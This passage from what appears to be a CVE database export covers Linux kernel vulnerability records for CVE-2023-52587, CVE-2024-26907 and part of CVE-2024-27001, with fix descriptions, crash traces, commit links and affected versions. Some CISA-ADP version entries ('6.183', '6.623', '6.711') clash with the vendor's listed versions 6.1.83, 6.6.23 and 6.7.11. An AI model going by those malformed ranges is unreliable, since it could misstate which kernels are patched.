"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nIB/ipoib: Fix mcast list locking\n\nReleasing the `priv-\u003elock` while iterating the `priv-\u003emulticast_list` in\n`ipoib_mcast_join_task()` opens a window for `ipoib_mcast_dev_flush()` to\nremove the items while in the middle of iteration. If the mcast is removed\nwhile the lock was dropped, the for loop spins forever resulting in a hard\nlockup (as was reported on RHEL 4.18.0-372.75.1.el8_6 kernel):\n\n Task A (kworker/u72:2 below) | Task B (kworker/u72:0 below)\n -----------------------------------+-----------------------------------\n ipoib_mcast_join_task(work) | ipoib_ib_dev_flush_light(work)\n spin_lock_irq(\u0026priv-\u003elock) | __ipoib_ib_dev_flush(priv, ...)\n list_for_each_entry(mcast, | ipoib_mcast_dev_flush(dev = priv-\u003edev)\n \u0026priv-\u003emulticast_list, list) |\n ipoib_mcast_join(dev, mcast) |\n spin_unlock_irq(\u0026priv-\u003elock) |\n | spin_lock_irqsave(\u0026priv-\u003elock, flags)\n | list_for_each_entry_safe(mcast, tmcast,\n | \u0026priv-\u003emulticast_list, list)\n | list_del(\u0026mcast-\u003elist);\n | list_add_tail(\u0026mcast-\u003elist, \u0026remove_list)\n | spin_unlock_irqrestore(\u0026priv-\u003elock, flags)\n spin_lock_irq(\u0026priv-\u003elock) |\n | ipoib_mcast_remove_list(\u0026remove_list)\n (Here, `mcast` is no longer on the | list_for_each_entry_safe(mcast, tmcast,\n `priv-\u003emulticast_list` and we keep | remove_list, list)\n spinning on the `remove_list` of | \u003e\u003e\u003e wait_for_completion(\u0026mcast-\u003edone)\n the other thread which is blocked |\n and the list is still valid on |\n it\u0027s stack.)\n\nFix this by keeping the lock held and changing to GFP_ATOMIC to prevent\neventual sleeps.\nUnfortunately we could not reproduce the lockup and confirm this fix but\nbased on the code review I think this fix should address such lockups.\n\ncrash\u003e bc 31\nPID: 747 TASK: ff1c6a1a007e8000 CPU: 31 COMMAND: \"kworker/u72:2\"\n--\n [exception RIP: ipoib_mcast_join_task+0x1b1]\n RIP: ffffffffc0944ac1 RSP: ff646f199a8c7e00 RFLAGS: 00000002\n RAX: 0000000000000000 RBX: ff1c6a1a04dc82f8 RCX: 0000000000000000\n work (\u0026priv-\u003emcast_task{,.work})\n RDX: ff1c6a192d60ac68 RSI: 0000000000000286 RDI: ff1c6a1a04dc8000\n \u0026mcast-\u003elist\n RBP: ff646f199a8c7e90 R8: ff1c699980019420 R9: ff1c6a1920c9a000\n R10: ff646f199a8c7e00 R11: ff1c6a191a7d9800 R12: ff1c6a192d60ac00\n mcast\n R13: ff1c6a1d82200000 R14: ff1c6a1a04dc8000 R15: ff1c6a1a04dc82d8\n dev priv (\u0026priv-\u003elock) \u0026priv-\u003emulticast_list (aka head)\n ORIG_RAX: ffffffffffffffff CS: 0010 SS: 0018\n--- \u003cNMI exception stack\u003e ---\n #5 [ff646f199a8c7e00] ipoib_mcast_join_task+0x1b1 at ffffffffc0944ac1 [ib_ipoib]\n #6 [ff646f199a8c7e98] process_one_work+0x1a7 at ffffffff9bf10967\n\ncrash\u003e rx ff646f199a8c7e68\nff646f199a8c7e68: ff1c6a1a04dc82f8 \u003c\u003c\u003c work = \u0026priv-\u003emcast_task.work\n\ncrash\u003e list -hO ipoib_dev_priv.multicast_list ff1c6a1a04dc8000\n(empty)\n\ncrash\u003e ipoib_dev_priv.mcast_task.work.func,mcast_mutex.owner.counter ff1c6a1a04dc8000\n mcast_task.work.func = 0xffffffffc0944910 \u003cipoib_mcast_join_task\u003e,\n mcast_mutex.owner.counter = 0xff1c69998efec000\n\ncrash\u003e b 8\nPID: 8 TASK: ff1c69998efec000 CPU: 33 COMMAND: \"kworker/u72:0\"\n--\n #3 [ff646f1980153d50] wait_for_completion+0x96 at ffffffff9c7d7646\n #4 [ff646f1980153d90] ipoib_mcast_remove_list+0x56 at ffffffffc0944dc6 [ib_ipoib]\n #5 [ff646f1980153de8] ipoib_mcast_dev_flush+0x1a7 at ffffffffc09455a7 [ib_ipoib]\n #6 [ff646f1980153e58] __ipoib_ib_dev_flush+0x1a4 at ffffffffc09431a4 [ib_ipoib]\n #7 [ff\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:39:17.602Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4c8922ae8eb8dcc1e4b7d1059d97a8334288d825"
},
{
"url": "https://git.kernel.org/stable/c/615e3adc2042b7be4ad122a043fc9135e6342c90"
},
{
"url": "https://git.kernel.org/stable/c/ac2630fd3c90ffec34a0bfc4d413668538b0e8f2"
},
{
"url": "https://git.kernel.org/stable/c/ed790bd0903ed3352ebf7f650d910f49b7319b34"
},
{
"url": "https://git.kernel.org/stable/c/5108a2dc2db5630fb6cd58b8be80a0c134bc310a"
},
{
"url": "https://git.kernel.org/stable/c/342258fb46d66c1b4c7e2c3717ac01e10c03cf18"
},
{
"url": "https://git.kernel.org/stable/c/7c7bd4d561e9dc6f5b7df9e184974915f6701a89"
},
{
"url": "https://git.kernel.org/stable/c/4f973e211b3b1c6d36f7c6a19239d258856749f9"
}
],
"title": "IB/ipoib: Fix mcast list locking",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52587",
"datePublished": "2024-03-06T06:45:21.418Z",
"dateReserved": "2024-03-02T21:55:42.570Z",
"dateUpdated": "2025-05-04T07:39:17.602Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26907 (GCVE-0-2024-26907)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:59
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
RDMA/mlx5: Fix fortify source warning while accessing Eth segment
------------[ cut here ]------------
memcpy: detected field-spanning write (size 56) of single field "eseg->inline_hdr.start" at /var/lib/dkms/mlnx-ofed-kernel/5.8/build/drivers/infiniband/hw/mlx5/wr.c:131 (size 2)
WARNING: CPU: 0 PID: 293779 at /var/lib/dkms/mlnx-ofed-kernel/5.8/build/drivers/infiniband/hw/mlx5/wr.c:131 mlx5_ib_post_send+0x191b/0x1a60 [mlx5_ib]
Modules linked in: 8021q garp mrp stp llc rdma_ucm(OE) rdma_cm(OE) iw_cm(OE) ib_ipoib(OE) ib_cm(OE) ib_umad(OE) mlx5_ib(OE) ib_uverbs(OE) ib_core(OE) mlx5_core(OE) pci_hyperv_intf mlxdevm(OE) mlx_compat(OE) tls mlxfw(OE) psample nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_inet nf_reject_ipv4 nf_reject_ipv6 nft_reject nft_ct nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 ip_set nf_tables libcrc32c nfnetlink mst_pciconf(OE) knem(OE) vfio_pci vfio_pci_core vfio_iommu_type1 vfio iommufd irqbypass cuse nfsv3 nfs fscache netfs xfrm_user xfrm_algo ipmi_devintf ipmi_msghandler binfmt_misc crct10dif_pclmul crc32_pclmul polyval_clmulni polyval_generic ghash_clmulni_intel sha512_ssse3 snd_pcsp aesni_intel crypto_simd cryptd snd_pcm snd_timer joydev snd soundcore input_leds serio_raw evbug nfsd auth_rpcgss nfs_acl lockd grace sch_fq_codel sunrpc drm efi_pstore ip_tables x_tables autofs4 psmouse virtio_net net_failover failover floppy
[last unloaded: mlx_compat(OE)]
CPU: 0 PID: 293779 Comm: ssh Tainted: G OE 6.2.0-32-generic #32~22.04.1-Ubuntu
Hardware name: Red Hat KVM, BIOS 0.5.1 01/01/2011
RIP: 0010:mlx5_ib_post_send+0x191b/0x1a60 [mlx5_ib]
Code: 0c 01 00 a8 01 75 25 48 8b 75 a0 b9 02 00 00 00 48 c7 c2 10 5b fd c0 48 c7 c7 80 5b fd c0 c6 05 57 0c 03 00 01 e8 95 4d 93 da <0f> 0b 44 8b 4d b0 4c 8b 45 c8 48 8b 4d c0 e9 49 fb ff ff 41 0f b7
RSP: 0018:ffffb5b48478b570 EFLAGS: 00010046
RAX: 0000000000000000 RBX: 0000000000000001 RCX: 0000000000000000
RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000
RBP: ffffb5b48478b628 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: ffffb5b48478b5e8
R13: ffff963a3c609b5e R14: ffff9639c3fbd800 R15: ffffb5b480475a80
FS: 00007fc03b444c80(0000) GS:ffff963a3dc00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000556f46bdf000 CR3: 0000000006ac6003 CR4: 00000000003706f0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
<TASK>
? show_regs+0x72/0x90
? mlx5_ib_post_send+0x191b/0x1a60 [mlx5_ib]
? __warn+0x8d/0x160
? mlx5_ib_post_send+0x191b/0x1a60 [mlx5_ib]
? report_bug+0x1bb/0x1d0
? handle_bug+0x46/0x90
? exc_invalid_op+0x19/0x80
? asm_exc_invalid_op+0x1b/0x20
? mlx5_ib_post_send+0x191b/0x1a60 [mlx5_ib]
mlx5_ib_post_send_nodrain+0xb/0x20 [mlx5_ib]
ipoib_send+0x2ec/0x770 [ib_ipoib]
ipoib_start_xmit+0x5a0/0x770 [ib_ipoib]
dev_hard_start_xmit+0x8e/0x1e0
? validate_xmit_skb_list+0x4d/0x80
sch_direct_xmit+0x116/0x3a0
__dev_xmit_skb+0x1fd/0x580
__dev_queue_xmit+0x284/0x6b0
? _raw_spin_unlock_irq+0xe/0x50
? __flush_work.isra.0+0x20d/0x370
? push_pseudo_header+0x17/0x40 [ib_ipoib]
neigh_connected_output+0xcd/0x110
ip_finish_output2+0x179/0x480
? __smp_call_single_queue+0x61/0xa0
__ip_finish_output+0xc3/0x190
ip_finish_output+0x2e/0xf0
ip_output+0x78/0x110
? __pfx_ip_finish_output+0x10/0x10
ip_local_out+0x64/0x70
__ip_queue_xmit+0x18a/0x460
ip_queue_xmit+0x15/0x30
__tcp_transmit_skb+0x914/0x9c0
tcp_write_xmit+0x334/0x8d0
tcp_push_one+0x3c/0x60
tcp_sendmsg_locked+0x2e1/0xac0
tcp_sendmsg+0x2d/0x50
inet_sendmsg+0x43/0x90
sock_sendmsg+0x68/0x80
sock_write_iter+0x93/0x100
vfs_write+0x326/0x3c0
ksys_write+0xbd/0xf0
? do_syscall_64+0x69/0x90
__x64_sys_write+0x19/0x30
do_syscall_
---truncated---
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.937Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d27c48dc309da72c3b46351a1205d89687272baa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/60ba938a8bc8c90e724c75f98e932f9fb7ae1b9d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cad82f1671e41094acd3b9a60cd27d67a3c64a21"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9a624a5f95733bac4648ecadb320ca83aa9c08fd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/185fa07000e0a81d54cf8c05414cebff14469a5c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4d5e86a56615cc387d21c629f9af8fb0e958d350"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "d27c48dc309d",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.11",
"status": "unaffected",
"version": "5.10.214",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.2",
"status": "unaffected",
"version": "6.183",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.7",
"status": "unaffected",
"version": "6.623",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "6.8",
"status": "unaffected",
"version": "6.711",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThanOrEqual": "5.16",
"status": "unaffected",
"version": "5.15.153",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "60ba938a8bc8",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThanOrEqual": "cad82f1671e4",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThanOrEqual": "9a624a5f9573",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThanOrEqual": "185fa07000e0",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
},
{
"lessThanOrEqual": "4d5e86a56615",
"status": "affected",
"version": "1da177e4c3f4",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26907",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-06T16:55:44.551098Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-06T16:55:51.074Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/hw/mlx5/wr.c",
"include/linux/mlx5/qp.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d27c48dc309da72c3b46351a1205d89687272baa",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "60ba938a8bc8c90e724c75f98e932f9fb7ae1b9d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cad82f1671e41094acd3b9a60cd27d67a3c64a21",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9a624a5f95733bac4648ecadb320ca83aa9c08fd",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "185fa07000e0a81d54cf8c05414cebff14469a5c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4d5e86a56615cc387d21c629f9af8fb0e958d350",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/hw/mlx5/wr.c",
"include/linux/mlx5/qp.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/mlx5: Fix fortify source warning while accessing Eth segment\n\n ------------[ cut here ]------------\n memcpy: detected field-spanning write (size 56) of single field \"eseg-\u003einline_hdr.start\" at /var/lib/dkms/mlnx-ofed-kernel/5.8/build/drivers/infiniband/hw/mlx5/wr.c:131 (size 2)\n WARNING: CPU: 0 PID: 293779 at /var/lib/dkms/mlnx-ofed-kernel/5.8/build/drivers/infiniband/hw/mlx5/wr.c:131 mlx5_ib_post_send+0x191b/0x1a60 [mlx5_ib]\n Modules linked in: 8021q garp mrp stp llc rdma_ucm(OE) rdma_cm(OE) iw_cm(OE) ib_ipoib(OE) ib_cm(OE) ib_umad(OE) mlx5_ib(OE) ib_uverbs(OE) ib_core(OE) mlx5_core(OE) pci_hyperv_intf mlxdevm(OE) mlx_compat(OE) tls mlxfw(OE) psample nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_inet nf_reject_ipv4 nf_reject_ipv6 nft_reject nft_ct nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 ip_set nf_tables libcrc32c nfnetlink mst_pciconf(OE) knem(OE) vfio_pci vfio_pci_core vfio_iommu_type1 vfio iommufd irqbypass cuse nfsv3 nfs fscache netfs xfrm_user xfrm_algo ipmi_devintf ipmi_msghandler binfmt_misc crct10dif_pclmul crc32_pclmul polyval_clmulni polyval_generic ghash_clmulni_intel sha512_ssse3 snd_pcsp aesni_intel crypto_simd cryptd snd_pcm snd_timer joydev snd soundcore input_leds serio_raw evbug nfsd auth_rpcgss nfs_acl lockd grace sch_fq_codel sunrpc drm efi_pstore ip_tables x_tables autofs4 psmouse virtio_net net_failover failover floppy\n [last unloaded: mlx_compat(OE)]\n CPU: 0 PID: 293779 Comm: ssh Tainted: G OE 6.2.0-32-generic #32~22.04.1-Ubuntu\n Hardware name: Red Hat KVM, BIOS 0.5.1 01/01/2011\n RIP: 0010:mlx5_ib_post_send+0x191b/0x1a60 [mlx5_ib]\n Code: 0c 01 00 a8 01 75 25 48 8b 75 a0 b9 02 00 00 00 48 c7 c2 10 5b fd c0 48 c7 c7 80 5b fd c0 c6 05 57 0c 03 00 01 e8 95 4d 93 da \u003c0f\u003e 0b 44 8b 4d b0 4c 8b 45 c8 48 8b 4d c0 e9 49 fb ff ff 41 0f b7\n RSP: 0018:ffffb5b48478b570 EFLAGS: 00010046\n RAX: 0000000000000000 RBX: 0000000000000001 RCX: 0000000000000000\n RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n RBP: ffffb5b48478b628 R08: 0000000000000000 R09: 0000000000000000\n R10: 0000000000000000 R11: 0000000000000000 R12: ffffb5b48478b5e8\n R13: ffff963a3c609b5e R14: ffff9639c3fbd800 R15: ffffb5b480475a80\n FS: 00007fc03b444c80(0000) GS:ffff963a3dc00000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000556f46bdf000 CR3: 0000000006ac6003 CR4: 00000000003706f0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n Call Trace:\n \u003cTASK\u003e\n ? show_regs+0x72/0x90\n ? mlx5_ib_post_send+0x191b/0x1a60 [mlx5_ib]\n ? __warn+0x8d/0x160\n ? mlx5_ib_post_send+0x191b/0x1a60 [mlx5_ib]\n ? report_bug+0x1bb/0x1d0\n ? handle_bug+0x46/0x90\n ? exc_invalid_op+0x19/0x80\n ? asm_exc_invalid_op+0x1b/0x20\n ? mlx5_ib_post_send+0x191b/0x1a60 [mlx5_ib]\n mlx5_ib_post_send_nodrain+0xb/0x20 [mlx5_ib]\n ipoib_send+0x2ec/0x770 [ib_ipoib]\n ipoib_start_xmit+0x5a0/0x770 [ib_ipoib]\n dev_hard_start_xmit+0x8e/0x1e0\n ? validate_xmit_skb_list+0x4d/0x80\n sch_direct_xmit+0x116/0x3a0\n __dev_xmit_skb+0x1fd/0x580\n __dev_queue_xmit+0x284/0x6b0\n ? _raw_spin_unlock_irq+0xe/0x50\n ? __flush_work.isra.0+0x20d/0x370\n ? push_pseudo_header+0x17/0x40 [ib_ipoib]\n neigh_connected_output+0xcd/0x110\n ip_finish_output2+0x179/0x480\n ? __smp_call_single_queue+0x61/0xa0\n __ip_finish_output+0xc3/0x190\n ip_finish_output+0x2e/0xf0\n ip_output+0x78/0x110\n ? __pfx_ip_finish_output+0x10/0x10\n ip_local_out+0x64/0x70\n __ip_queue_xmit+0x18a/0x460\n ip_queue_xmit+0x15/0x30\n __tcp_transmit_skb+0x914/0x9c0\n tcp_write_xmit+0x334/0x8d0\n tcp_push_one+0x3c/0x60\n tcp_sendmsg_locked+0x2e1/0xac0\n tcp_sendmsg+0x2d/0x50\n inet_sendmsg+0x43/0x90\n sock_sendmsg+0x68/0x80\n sock_write_iter+0x93/0x100\n vfs_write+0x326/0x3c0\n ksys_write+0xbd/0xf0\n ? do_syscall_64+0x69/0x90\n __x64_sys_write+0x19/0x30\n do_syscall_\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:59:21.343Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d27c48dc309da72c3b46351a1205d89687272baa"
},
{
"url": "https://git.kernel.org/stable/c/60ba938a8bc8c90e724c75f98e932f9fb7ae1b9d"
},
{
"url": "https://git.kernel.org/stable/c/cad82f1671e41094acd3b9a60cd27d67a3c64a21"
},
{
"url": "https://git.kernel.org/stable/c/9a624a5f95733bac4648ecadb320ca83aa9c08fd"
},
{
"url": "https://git.kernel.org/stable/c/185fa07000e0a81d54cf8c05414cebff14469a5c"
},
{
"url": "https://git.kernel.org/stable/c/4d5e86a56615cc387d21c629f9af8fb0e958d350"
}
],
"title": "RDMA/mlx5: Fix fortify source warning while accessing Eth segment",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26907",
"datePublished": "2024-04-17T10:27:54.194Z",
"dateReserved": "2024-02-19T14:20:24.187Z",
"dateUpdated": "2025-05-04T08:59:21.343Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27001 (GCVE-0-2024-27001)
Vulnerability from cvelistv5
Published
2024-05-01 05:28
Modified
2025-11-04 17:16
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
comedi: vmk80xx: fix incomplete endpoint checking
While vmk80xx does have endpoint checking implemented, some things
can fall through the cracks. Depending on the hardware model,
URBs can have either bulk or interrupt type, and current version
of vmk80xx_find_usb_endpoints() function does not take that fully
into account. While this warning does not seem to be too harmful,
at the very least it will crash systems with 'panic_on_warn' set on
them.
Fix the issue found by Syzkaller [1] by somewhat simplifying the
endpoint checking process with usb_find_common_endpoints() and
ensuring that only expected endpoint types are present.
This patch has not been tested on real hardware.
[1] Syzkaller report:
usb 1-1: BOGUS urb xfer, pipe 1 != type 3
WARNING: CPU: 0 PID: 781 at drivers/usb/core/urb.c:504 usb_submit_urb+0xc4e/0x18c0 drivers/usb/core/urb.c:503
...
Call Trace:
<TASK>
usb_start_wait_urb+0x113/0x520 drivers/usb/core/message.c:59
vmk80xx_reset_device drivers/comedi/drivers/vmk80xx.c:227 [inline]
vmk80xx_auto_attach+0xa1c/0x1a40 drivers/comedi/drivers/vmk80xx.c:818
comedi_auto_config+0x238/0x380 drivers/comedi/drivers.c:1067
usb_probe_interface+0x5cd/0xb00 drivers/usb/core/driver.c:399
...
Similar issue also found by Syzkaller:
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 49253d542cc0f5f771dc254d248162a2a666649d Version: 49253d542cc0f5f771dc254d248162a2a666649d Version: 49253d542cc0f5f771dc254d248162a2a666649d Version: 49253d542cc0f5f771dc254d248162a2a666649d Version: 49253d542cc0f5f771dc254d248162a2a666649d Version: 49253d542cc0f5f771dc254d248162a2a666649d Version: 49253d542cc0f5f771dc254d248162a2a666649d Version: 49253d542cc0f5f771dc254d248162a2a666649d |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27001",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
